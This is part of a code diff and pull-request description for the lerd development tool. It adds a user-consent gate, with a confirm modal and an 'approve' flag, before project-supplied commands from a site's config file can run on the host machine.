+		t.Error("an approved project command should not force the confirm modal")
 	}
 }

--- a/internal/ui/web/src/components/CommandRunModal.svelte
+++ b/internal/ui/web/src/components/CommandRunModal.svelte
@@ -109,7 +109,7 @@
       <div class="mt-5 flex items-center justify-end gap-2">
         <button onclick={closeRun} class="px-3 py-1.5 rounded-md text-xs font-medium text-gray-700 dark:text-gray-300 hover:bg-gray-100 dark:hover:bg-white/5">{m.common_cancel()}</button>
         <button
-          onclick={() => $currentRun.kind === 'confirm' && executeCommand($currentRun.domain, cmd)}
+          onclick={() => $currentRun.kind === 'confirm' && executeCommand($currentRun.domain, cmd, '', true)}
           class="px-3 py-1.5 rounded-md text-xs font-medium bg-lerd-red hover:bg-lerd-redhov text-white"
         >{m.cmdrun_runAnyway()}</button>
       </div>

--- a/internal/ui/web/src/stores/commands.ts
+++ b/internal/ui/web/src/stores/commands.ts
@@ -39,10 +39,14 @@ export async function runCommand(
   domain: string,
   name: string,
   cb: RunCallbacks = {},
-  branch = ''
+  branch = '',
+  approve = false
 ): Promise<void> {
   const path = `/api/sites/${encodeURIComponent(domain)}/commands/${encodeURIComponent(name)}/run`;
-  const q = branch ? `?branch=${encodeURIComponent(branch)}` : '';
+  const params = new URLSearchParams();
+  if (branch) params.set('branch', branch);
+  if (approve) params.set('approve', '1');
+  const q = params.toString() ? `?${params.toString()}` : '';
   const res = await apiFetch(path + q, { method: 'POST', signal: cb.signal });
   if (!res.ok) {
     cb.onError?.(`${res.status} ${res.statusText}`);
@@ -56,6 +60,8 @@ export async function runCommand(
       const payload = await res.json();
       if (payload?.terminal) {
         cb.onTerminal?.();
+      } else if (payload?.needsConfirm) {
+        cb.onError?.('This command runs on your host and needs confirmation. Reopen it and confirm to run.');
       } else if (payload?.error) {
         cb.onError?.(String(payload.error));
       }
@@ -202,8 +208,11 @@ export function launchCommand(domain: string, cmd: Command, opts: { skipConfirm?
   void executeCommand(domain, cmd, opts.branch);
 }
 
-export async function executeCommand(domain: string, cmd: Command, branch = '') {
-  return runInModal(domain, cmd, branch, (cb) => runCommand(domain, cmd.name, cb, branch));
+// approve carries the user's consent (from the confirm modal) for a project-
+// supplied command that the server gates as host execution; the server persists
+// it on first run so later runs don't re-prompt.
+export async function executeCommand(domain: string, cmd: Command, branch = '', approve = false) {
+  return runInModal(domain, cmd, branch, (cb) => runCommand(domain, cmd.name, cb, branch, approve));
 }
 
 // executeDoctorFix runs a doctor fix (composer update, npm audit fix, …) in the


### PR DESCRIPTION
Closes the broad host-execution boundary that the #690/#691 fixes deliberately left open: a project's untrusted .lerd.yaml could still run commands on the host with no consent, through host:true workers (custom_workers and an embedded framework_def) and through commands run via lerd run, the dashboard, and the commands_run MCP tool.

An embedded framework_def is now stripped of its host:true workers and its whole commands list when it is imported into the store, the same way the doctor-command fix stripped its command checks, so the store never holds project-origin host execution. The host-proxy dev server keeps its own existing gate.

A project's own host extensions still work, with consent. Custom host workers and top-level project commands are tagged project-origin at the merge points and gated at the host-execution boundary: starting a host custom worker or running a project command shows the exact command and asks once, the approval is remembered per site (in the registry) so boot restore and later runs don't re-prompt, and lerd run --yes / the dashboard confirm modal / commands_run force: true carry that consent. A new host_commands.disabled and host_commands.skip_confirmation global mirror the host-proxy knobs. Trusted store, built-in, and user-overlay definitions, in-container workers, and framework-provided commands are unaffected.

A store yaml imported by an older build may still hold a poisoned framework_def host worker or command; detection rewrites the sanitized def on the next run, so it self-heals.

Refs #692